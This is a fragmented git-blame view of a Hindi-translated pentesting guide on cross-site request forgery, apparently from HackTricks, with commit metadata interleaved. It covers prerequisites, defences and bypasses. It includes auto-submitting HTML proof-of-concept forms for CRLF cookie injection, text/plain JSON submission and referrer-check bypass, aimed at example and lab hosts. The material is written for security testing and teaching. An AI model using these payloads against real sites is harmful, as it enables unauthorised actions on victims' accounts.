											2022-04-28 16:01:33 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2023-12-31 07:08:04 +00:00
+								</details>
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+								{% endhint %}
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
-												Translated ['README.md', 'generic-methodologies-and-resources/pentesting

											
										
										
											2024-11-19 12:34:11 +00:00
+								<figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
-												hp

											
										
										
											2023-02-27 09:28:45 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+								Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
-												hp

											
										
										
											2023-07-14 15:03:41 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+								**Hacking Insights**\
 								Engage with content that delves into the thrill and challenges of hacking
-												hp

											
										
										
											2023-07-14 15:03:41 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+								**Real-Time Hack News**\
 								Keep up-to-date with fast-paced hacking world through real-time news and insights
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+								**Latest Announcements**\
 								Stay informed with the newest bug bounties launching and crucial platform updates
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+								**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'generic-methodologies-and-resources/pentesting

											
										
										
											2024-11-19 12:34:11 +00:00
+								## क्रॉस-साइट अनुरोध धोखाधड़ी (CSRF) समझाया गया
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'generic-methodologies-and-resources/pentesting

											
										
										
											2024-11-19 12:34:11 +00:00
+								**क्रॉस-साइट अनुरोध धोखाधड़ी (CSRF)** एक प्रकार की सुरक्षा कमजोरी है जो वेब अनुप्रयोगों में पाई जाती है। यह हमलावरों को अनजान उपयोगकर्ताओं की ओर से कार्य करने की अनुमति देती है, उनके प्रमाणित सत्रों का लाभ उठाकर। यह हमला तब होता है जब एक उपयोगकर्ता, जो एक पीड़ित के प्लेटफॉर्म में लॉग इन है, एक दुर्भावनापूर्ण साइट पर जाता है। यह साइट फिर पीड़ित के खाते के लिए अनुरोधों को ट्रिगर करती है, जैसे कि जावास्क्रिप्ट को निष्पादित करना, फॉर्म सबमिट करना, या छवियों को लाना।
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 17:48:00 +00:00
-												Translated ['README.md', 'generic-methodologies-and-resources/pentesting

											
										
										
											2024-11-19 12:34:11 +00:00
+								### CSRF हमले के लिए पूर्वापेक्षाएँ
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 17:48:00 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+								CSRF कमजोरी का लाभ उठाने के लिए, कई शर्तें पूरी होनी चाहिए:
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 17:48:00 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+. **एक मूल्यवान क्रिया की पहचान करें**: हमलावर को एक ऐसा कार्य खोजना होगा जिसका लाभ उठाया जा सके, जैसे उपयोगकर्ता का पासवर्ड, ईमेल बदलना, या विशेषाधिकार बढ़ाना।
 . **सत्र प्रबंधन**: उपयोगकर्ता का सत्र केवल कुकीज़ या HTTP बेसिक प्रमाणीकरण हेडर के माध्यम से प्रबंधित किया जाना चाहिए, क्योंकि अन्य हेडर का इस उद्देश्य के लिए हेरफेर नहीं किया जा सकता।
 . **अनपेक्षित पैरामीटर का अभाव**: अनुरोध में अनपेक्षित पैरामीटर नहीं होने चाहिए, क्योंकि वे हमले को रोक सकते हैं।
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 17:48:00 +00:00
-												Translated ['README.md', 'generic-methodologies-and-resources/pentesting

											
										
										
											2024-11-19 12:34:11 +00:00
+								### त्वरित जांच
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 17:48:00 +00:00
-												Translated ['README.md', 'generic-methodologies-and-resources/pentesting

											
										
										
											2024-11-19 12:34:11 +00:00
+								आप **Burp में अनुरोध कैप्चर** कर सकते हैं और CSRF सुरक्षा की जांच कर सकते हैं और ब्राउज़र से परीक्षण करने के लिए आप **Copy as fetch** पर क्लिक कर सकते हैं और अनुरोध की जांच कर सकते हैं:
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2023-12-31 07:08:04 +00:00
-												Translated ['binary-exploitation/libc-heap/README.md', 'binary-exploitat

											
										
										
											2024-09-16 20:58:22 +00:00
+								<figure><img src="../.gitbook/assets/image (11) (1) (1).png" alt=""><figcaption></figcaption></figure>
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2023-12-31 07:08:04 +00:00
-												Translated ['README.md', 'generic-methodologies-and-resources/pentesting

											
										
										
											2024-11-19 12:34:11 +00:00
+								### CSRF के खिलाफ रक्षा
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2023-12-31 07:08:04 +00:00
-												Translated ['README.md', 'generic-methodologies-and-resources/pentesting

											
										
										
											2024-11-19 12:34:11 +00:00
+								CSRF हमलों से बचाने के लिए कई प्रतिकृतियाँ लागू की जा सकती हैं:
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2023-12-31 07:08:04 +00:00
-												Translated ['binary-exploitation/libc-heap/README.md', 'binary-exploitat

											
										
										
											2024-09-16 20:58:22 +00:00
+								* [**SameSite कुकीज़**](hacking-with-cookies/#samesite): यह विशेषता ब्राउज़र को क्रॉस-साइट अनुरोधों के साथ कुकीज़ भेजने से रोकती है। [SameSite कुकीज़ के बारे में अधिक जानें](hacking-with-cookies/#samesite)।
-												Translated ['README.md', 'generic-methodologies-and-resources/pentesting

											
										
										
											2024-11-19 12:34:11 +00:00
+								* [**क्रॉस-उत्पत्ति संसाधन साझा करना**](cors-bypass.md): पीड़ित साइट की CORS नीति हमले की व्यवहार्यता को प्रभावित कर सकती है, विशेष रूप से यदि हमले को पीड़ित साइट से प्रतिक्रिया पढ़ने की आवश्यकता हो। [CORS बायपास के बारे में जानें](cors-bypass.md)।
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+								* **उपयोगकर्ता सत्यापन**: उपयोगकर्ता का पासवर्ड मांगना या कैप्चा हल करना उपयोगकर्ता की मंशा की पुष्टि कर सकता है।
-												Translated ['README.md', 'generic-methodologies-and-resources/pentesting

											
										
										
											2024-11-19 12:34:11 +00:00
+								* **रेफरर या मूल हेडर की जांच करना**: इन हेडरों को मान्य करना यह सुनिश्चित करने में मदद कर सकता है कि अनुरोध विश्वसनीय स्रोतों से आ रहे हैं। हालाँकि, URLs को सावधानीपूर्वक तैयार करने से खराब तरीके से लागू की गई जांचों को बायपास किया जा सकता है, जैसे:
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+								* `http://mal.net?orig=http://example.com` का उपयोग करना (URL विश्वसनीय URL के साथ समाप्त होता है)
 								* `http://example.com.mal.net` का उपयोग करना (URL विश्वसनीय URL के साथ शुरू होता है)
-												Translated ['README.md', 'generic-methodologies-and-resources/pentesting

											
										
										
											2024-11-19 12:34:11 +00:00
+								* **पैरामीटर नामों में संशोधन**: POST या GET अनुरोधों में पैरामीटर के नामों को बदलना स्वचालित हमलों को रोकने में मदद कर सकता है।
 								* **CSRF टोकन**: प्रत्येक सत्र में एक अद्वितीय CSRF टोकन को शामिल करना और इस टोकन की आवश्यकता करना अगले अनुरोधों में CSRF के जोखिम को काफी कम कर सकता है। टोकन की प्रभावशीलता को CORS को लागू करके बढ़ाया जा सकता है।
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'generic-methodologies-and-resources/pentesting

											
										
										
											2024-11-19 12:34:11 +00:00
+								इन रक्षा उपायों को समझना और लागू करना वेब अनुप्रयोगों की सुरक्षा और अखंडता बनाए रखने के लिए महत्वपूर्ण है।
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'generic-methodologies-and-resources/pentesting

											
										
										
											2024-11-19 12:34:11 +00:00
+								## रक्षा बायपास
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'generic-methodologies-and-resources/pentesting

											
										
										
											2024-11-19 12:34:11 +00:00
+								### POST से GET
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['binary-exploitation/libc-heap/README.md', 'binary-exploitat

											
										
										
											2024-09-16 20:58:22 +00:00
+								शायद जिस फॉर्म का आप दुरुपयोग करना चाहते हैं वह **CSRF टोकन के साथ POST अनुरोध भेजने के लिए तैयार है**, लेकिन आपको **जांचना चाहिए** कि क्या एक **GET** भी **मान्य** है और यदि जब आप GET अनुरोध भेजते हैं तो **CSRF टोकन अभी भी मान्य है**।
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'generic-methodologies-and-resources/pentesting

											
										
										
											2024-11-19 12:34:11 +00:00
+								### टोकन की कमी
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'generic-methodologies-and-resources/pentesting

											
										
										
											2024-11-19 12:34:11 +00:00
+								अनुप्रयोग एक तंत्र लागू कर सकते हैं **टोकनों को मान्य करने के लिए** जब वे मौजूद होते हैं। हालाँकि, एक कमजोरी तब उत्पन्न होती है जब टोकन के अनुपस्थित होने पर मान्यता पूरी तरह से छोड़ दी जाती है। हमलावर इस पर **टोकन ले जाने वाले पैरामीटर को हटा कर** इसका लाभ उठा सकते हैं, न कि केवल इसके मान को। इससे उन्हें मान्यता प्रक्रिया को बायपास करने और प्रभावी रूप से क्रॉस-साइट अनुरोध धोखाधड़ी (CSRF) हमले को अंजाम देने की अनुमति मिलती है।
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
-												Translated ['README.md', 'generic-methodologies-and-resources/pentesting

											
										
										
											2024-11-19 12:34:11 +00:00
+								### CSRF टोकन उपयोगकर्ता सत्र से बंधा नहीं है
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
-												Translated ['README.md', 'generic-methodologies-and-resources/pentesting

											
										
										
											2024-11-19 12:34:11 +00:00
+								अनुप्रयोग **CSRF टोकनों को उपयोगकर्ता सत्रों से नहीं बांधने** पर एक महत्वपूर्ण **सुरक्षा जोखिम** प्रस्तुत करते हैं। ये सिस्टम टोकनों को एक **वैश्विक पूल** के खिलाफ मान्य करते हैं, बजाय इसके कि प्रत्येक टोकन को आरंभिक सत्र से बंधा हो।
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
-												Translated ['README.md', 'generic-methodologies-and-resources/pentesting

											
										
										
											2024-11-19 12:34:11 +00:00
+								हमलावर इस तरह से इसका लाभ उठाते हैं:
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
 . **अपने खाते का उपयोग करके प्रमाणीकरण करें**।
 . **वैध CSRF टोकन प्राप्त करें** वैश्विक पूल से।
-												Translated ['README.md', 'generic-methodologies-and-resources/pentesting

											
										
										
											2024-11-19 12:34:11 +00:00
+. **इस टोकन का उपयोग करें** एक पीड़ित के खिलाफ CSRF हमले में।
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
-												Translated ['README.md', 'generic-methodologies-and-resources/pentesting

											
										
										
											2024-11-19 12:34:11 +00:00
+								यह कमजोरी हमलावरों को पीड़ित की ओर से अनधिकृत अनुरोध करने की अनुमति देती है, अनुप्रयोग के **अपर्याप्त टोकन मान्यता तंत्र** का लाभ उठाते हुए।
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
-												Translated ['README.md', 'generic-methodologies-and-resources/pentesting

											
										
										
											2024-11-19 12:34:11 +00:00
+								### विधि बायपास
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
 								यदि अनुरोध एक "**अजीब**" **विधि** का उपयोग कर रहा है, तो जांचें कि क्या **विधि** **ओवरराइड कार्यक्षमता** काम कर रही है। उदाहरण के लिए, यदि यह **PUT** विधि का उपयोग कर रहा है, तो आप **POST** विधि का उपयोग करने का प्रयास कर सकते हैं और **भेजें**: _https://example.com/my/dear/api/val/num?**\_method=PUT**_
 								यह **POST अनुरोध के अंदर \_method पैरामीटर** भेजकर या **हेडर** का उपयोग करके भी काम कर सकता है:
 								* _X-HTTP-Method_
 								* _X-HTTP-Method-Override_
 								* _X-Method-Override_
-												Translated ['README.md', 'generic-methodologies-and-resources/pentesting

											
										
										
											2024-11-19 12:34:11 +00:00
+								### कस्टम हेडर टोकन बायपास
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
-												Translated ['binary-exploitation/libc-heap/README.md', 'binary-exploitat

											
										
										
											2024-09-16 20:58:22 +00:00
+								यदि अनुरोध एक **कस्टम हेडर** के साथ एक **टोकन** जोड़ रहा है जिसे **CSRF सुरक्षा विधि** के रूप में उपयोग किया जा रहा है, तो:
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
 								* **कस्टमाइज्ड टोकन और हेडर के बिना अनुरोध का परीक्षण करें।**
-												Translated ['README.md', 'generic-methodologies-and-resources/pentesting

											
										
										
											2024-11-19 12:34:11 +00:00
+								* **सटीक समान लंबाई लेकिन अलग टोकन** के साथ अनुरोध का परीक्षण करें।
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
-												Translated ['README.md', 'generic-methodologies-and-resources/pentesting

											
										
										
											2024-11-19 12:34:11 +00:00
+								### CSRF टोकन एक कुकी द्वारा मान्य किया गया है
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
-												Translated ['README.md', 'generic-methodologies-and-resources/pentesting

											
										
										
											2024-11-19 12:34:11 +00:00
+								अनुप्रयोग CSRF सुरक्षा को टोकन को एक कुकी और एक अनुरोध पैरामीटर में दोहराकर या एक CSRF कुकी सेट करके और यह सत्यापित करके लागू कर सकते हैं कि बैकएंड में भेजा गया टोकन कुकी के अनुरूप है। अनुप्रयोग अनुरोधों को मान्य करता है यह जांचकर कि क्या अनुरोध पैरामीटर में टोकन कुकी में मान के साथ मेल खाता है।
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
-												Translated ['README.md', 'generic-methodologies-and-resources/pentesting

											
										
										
											2024-11-19 12:34:11 +00:00
+								हालांकि, यदि वेबसाइट में ऐसी खामियाँ हैं जो हमलावर को पीड़ित के ब्राउज़र में CSRF कुकी सेट करने की अनुमति देती हैं, जैसे कि CRLF कमजोरी, तो यह विधि CSRF हमलों के प्रति संवेदनशील है। हमलावर इसका लाभ उठाकर एक धोखाधड़ी छवि लोड कर सकता है जो कुकी सेट करती है, इसके बाद CSRF हमले को शुरू कर सकता है।
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
 								नीचे एक उदाहरण है कि एक हमला कैसे संरचित किया जा सकता है:
-												GitBook: [#2876] save

											
										
										
											2021-11-30 16:46:07 +00:00
+								```html
 								<html>
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-05 20:37:38 +00:00
+								<!-- CSRF Proof of Concept - generated by Burp Suite Professional -->
-												Translated to Hindi

											
										
										
											2023-11-06 08:38:02 +00:00
+								<body>
 								<script>history.pushState('', '', '/')</script>
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-05 20:37:38 +00:00
+								<form action="https://example.com/my-account/change-email" method="POST">
-												Translated to Hindi

											
										
										
											2023-11-06 08:38:02 +00:00
+								<input type="hidden" name="email" value="asd&#64;asd&#46;asd" />
 								<input type="hidden" name="csrf" value="tZqZzQ1tiPj8KFnO4FOAawq7UsYzDk8E" />
 								<input type="submit" value="Submit request" />
 								</form>
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-05 20:37:38 +00:00
+								<img src="https://example.com/?search=term%0d%0aSet-Cookie:%20csrf=tZqZzQ1tiPj8KFnO4FOAawq7UsYzDk8E" onerror="document.forms[0].submit();"/>
-												Translated to Hindi

											
										
										
											2023-11-06 08:38:02 +00:00
+								</body>
-												GitBook: [#2876] save

											
										
										
											2021-11-30 16:46:07 +00:00
+								</html>
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-05 20:37:38 +00:00
-												GitBook: [#2876] save

											
										
										
											2021-11-30 16:46:07 +00:00
+								```
 								{% hint style="info" %}
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+								ध्यान दें कि यदि **csrf टोकन सत्र कुकी से संबंधित है तो यह हमला काम नहीं करेगा** क्योंकि आपको पीड़ित का सत्र सेट करना होगा, और इसलिए आप खुद पर हमला कर रहे होंगे।
-												GitBook: [#2876] save

											
										
										
											2021-11-30 16:46:07 +00:00
+								{% endhint %}
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+								### Content-Type परिवर्तन
-												GitBook: [master] one page modified
											
										
										
											2020-08-10 09:56:57 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+								[**इस**](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple\_requests) के अनुसार, **preflight** अनुरोधों से बचने के लिए **POST** विधि का उपयोग करते समय ये अनुमत Content-Type मान हैं:
-												GitBook: [master] 8 pages and 14 assets modified
											
										
										
											2021-05-29 20:00:49 +00:00
 								* **`application/x-www-form-urlencoded`**
 								* **`multipart/form-data`**
 								* **`text/plain`**
-												Translated ['README.md', 'generic-methodologies-and-resources/pentesting

											
										
										
											2024-11-19 12:34:11 +00:00
+								हालांकि, ध्यान दें कि **सर्वर की लॉजिक भिन्न हो सकती है** उपयोग किए गए **Content-Type** के आधार पर, इसलिए आपको उल्लेखित मानों और अन्य जैसे **`application/json`**_**,**_**`text/xml`**, **`application/xml`**_._ का प्रयास करना चाहिए।
-												GitBook: [#3120] No subject

											
										
										
											2022-04-22 08:32:18 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+								उदाहरण ( [यहां](https://brycec.me/posts/corctf\_2021\_challenges) से) JSON डेटा को text/plain के रूप में भेजने का:
-												GitBook: [#3120] No subject

											
										
										
											2022-04-22 08:32:18 +00:00
+								```html
 								<html>
-												Translated to Hindi

											
										
										
											2023-11-06 08:38:02 +00:00
+								<body>
 								<form id="form" method="post" action="https://phpme.be.ax/" enctype="text/plain">
 								<input name='{"garbageeeee":"' value='", "yep": "yep yep yep", "url": "https://webhook/"}'>
 								</form>
 								<script>
 								form.submit();
 								</script>
 								</body>
-												GitBook: [#3120] No subject

											
										
										
											2022-04-22 08:32:18 +00:00
+								</html>
 								```
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+								### JSON डेटा के लिए प्रीफ्लाइट अनुरोधों को बायपास करना
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-05 20:37:38 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+								जब POST अनुरोध के माध्यम से JSON डेटा भेजने का प्रयास किया जाता है, तो HTML फॉर्म में `Content-Type: application/json` का उपयोग सीधे संभव नहीं है। इसी तरह, इस सामग्री प्रकार को भेजने के लिए `XMLHttpRequest` का उपयोग करने से एक प्रीफ्लाइट अनुरोध शुरू होता है। फिर भी, इस सीमा को बायपास करने और यह जांचने के लिए रणनीतियाँ हैं कि क्या सर्वर सामग्री प्रकार की परवाह किए बिना JSON डेटा को संसाधित करता है:
-												GitBook: [#3120] No subject

											
										
										
											2022-04-22 08:32:18 +00:00
-												Translated ['binary-exploitation/libc-heap/README.md', 'binary-exploitat

											
										
										
											2024-09-16 20:58:22 +00:00
+. **वैकल्पिक सामग्री प्रकार का उपयोग करें**: फॉर्म में `enctype="text/plain"` सेट करके `Content-Type: text/plain` या `Content-Type: application/x-www-form-urlencoded` का उपयोग करें। यह दृष्टिकोण परीक्षण करता है कि क्या बैकएंड डेटा का उपयोग करता है चाहे सामग्री प्रकार कुछ भी हो।
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+. **सामग्री प्रकार को संशोधित करें**: प्रीफ्लाइट अनुरोध से बचने के लिए जबकि यह सुनिश्चित करते हुए कि सर्वर सामग्री को JSON के रूप में पहचानता है, आप डेटा को `Content-Type: text/plain; application/json` के साथ भेज सकते हैं। यह प्रीफ्लाइट अनुरोध को ट्रिगर नहीं करता है लेकिन यदि सर्वर को `application/json` स्वीकार करने के लिए कॉन्फ़िगर किया गया है तो इसे सही ढंग से संसाधित किया जा सकता है।
 . **SWF फ्लैश फ़ाइल का उपयोग**: एक कम सामान्य लेकिन संभव विधि में ऐसे प्रतिबंधों को बायपास करने के लिए SWF फ्लैश फ़ाइल का उपयोग करना शामिल है। इस तकनीक की गहन समझ के लिए, [इस पोस्ट](https://anonymousyogi.medium.com/json-csrf-csrf-that-none-talks-about-c2bf9a480937) को देखें।
-												GitBook: [master] 3 pages and 6 assets modified
											
										
										
											2021-10-05 10:00:17 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+								### रेफरर / मूल जांच बायपास
-												GitBook: [master] 3 pages and 6 assets modified
											
										
										
											2021-10-05 10:00:17 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-05 20:37:38 +00:00
+								**रेफरर हेडर से बचें**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+								ऐप्लिकेशन केवल तब 'Referer' हेडर को मान्य कर सकते हैं जब यह मौजूद हो। इस हेडर को भेजने से रोकने के लिए, निम्नलिखित HTML मेटा टैग का उपयोग किया जा सकता है:
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-05 20:37:38 +00:00
+								```xml
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								<meta name="referrer" content="never">
 								```
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+								यह सुनिश्चित करता है कि 'Referer' हेडर को छोड़ दिया गया है, जिससे कुछ अनुप्रयोगों में मान्यता जांचों को बायपास किया जा सकता है।
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-05 20:37:38 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+								**Regexp बायपास**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												GitBook: [#3007] No subject

											
										
										
											2022-02-13 12:30:13 +00:00
+								{% content-ref url="ssrf-server-side-request-forgery/url-format-bypass.md" %}
 								[url-format-bypass.md](ssrf-server-side-request-forgery/url-format-bypass.md)
 								{% endcontent-ref %}
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+								Referrer द्वारा भेजे जाने वाले पैरामीटर के अंदर URL में सर्वर का डोमेन नाम सेट करने के लिए आप कर सकते हैं:
-												GitBook: [#2876] save

											
										
										
											2021-11-30 16:46:07 +00:00
+								```html
 								<html>
-												Translated to Hindi

											
										
										
											2023-11-06 08:38:02 +00:00
+								<!-- Referrer policy needed to send the qury parameter in the referrer -->
 								<head><meta name="referrer" content="unsafe-url"></head>
 								<body>
 								<script>history.pushState('', '', '/')</script>
 								<form action="https://ac651f671e92bddac04a2b2e008f0069.web-security-academy.net/my-account/change-email" method="POST">
 								<input type="hidden" name="email" value="asd&#64;asd&#46;asd" />
 								<input type="submit" value="Submit request" />
 								</form>
 								<script>
 								// You need to set this or the domain won't appear in the query of the referer header
 								history.pushState("", "", "?ac651f671e92bddac04a2b2e008f0069.web-security-academy.net")
 								document.forms[0].submit();
 								</script>
 								</body>
-												GitBook: [#2876] save

											
										
										
											2021-11-30 16:46:07 +00:00
+								</html>
 								```
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+								### **HEAD विधि बायपास**
-												GitBook: [#2876] save

											
										
										
											2021-11-30 16:46:07 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+								[**इस CTF लेख**](https://github.com/google/google-ctf/tree/master/2023/web-vegsoda/solution) के पहले भाग में समझाया गया है कि [Oak का स्रोत कोड](https://github.com/oakserver/oak/blob/main/router.ts#L281), एक राउटर को **HEAD अनुरोधों को GET अनुरोधों के रूप में संभालने** के लिए सेट किया गया है जिसमें कोई प्रतिक्रिया शरीर नहीं है - एक सामान्य समाधान जो Oak के लिए अद्वितीय नहीं है। HEAD reqs से निपटने के लिए एक विशिष्ट हैंडलर के बजाय, उन्हें बस **GET हैंडलर को दिया जाता है लेकिन ऐप बस प्रतिक्रिया शरीर को हटा देता है**।
-												Translated ['README.md', 'binary-exploitation/rop-return-oriented-progra

											
										
										
											2024-05-08 17:24:24 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+								इसलिए, यदि GET अनुरोध को सीमित किया जा रहा है, तो आप बस **एक HEAD अनुरोध भेज सकते हैं जिसे GET अनुरोध के रूप में संसाधित किया जाएगा**।
-												Translated ['README.md', 'binary-exploitation/rop-return-oriented-progra

											
										
										
											2024-05-08 17:24:24 +00:00
 								## **शोषण उदाहरण**
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+								### **CSRF टोकन निकालना**
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
-												Translated ['README.md', 'generic-methodologies-and-resources/pentesting

											
										
										
											2024-11-19 12:34:11 +00:00
+								यदि एक **CSRF टोकन** को **रक्षा** के रूप में उपयोग किया जा रहा है, तो आप एक [**XSS**](xss-cross-site-scripting/#xss-stealing-csrf-tokens) भेद्यता या [**Dangling Markup**](dangling-markup-html-scriptless-injection/) भेद्यता का दुरुपयोग करके इसे **निकालने** की कोशिश कर सकते हैं।
-												Translated ['README.md', 'binary-exploitation/rop-return-oriented-progra

											
										
										
											2024-05-08 17:24:24 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+								### **HTML टैग का उपयोग करके GET**
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-05 20:37:38 +00:00
+								```xml
-												GitBook: [master] 3 pages and 6 assets modified
											
										
										
											2021-10-05 10:00:17 +00:00
+								<img src="http://google.es?param=VALUE" style="display:none" />
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								<h1>404 - Page not found</h1>
 								The URL you are requesting is no longer available
 								```
-												Translated ['README.md', 'binary-exploitation/rop-return-oriented-progra

											
										
										
											2024-05-08 17:24:24 +00:00
+								अन्य HTML5 टैग जो स्वचालित रूप से GET अनुरोध भेजने के लिए उपयोग किए जा सकते हैं:
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-05 20:37:38 +00:00
+								```html
 								<iframe src="..."></iframe>
 								<script src="..."></script>
 								<img src="..." alt="">
 								<embed src="...">
 								<audio src="...">
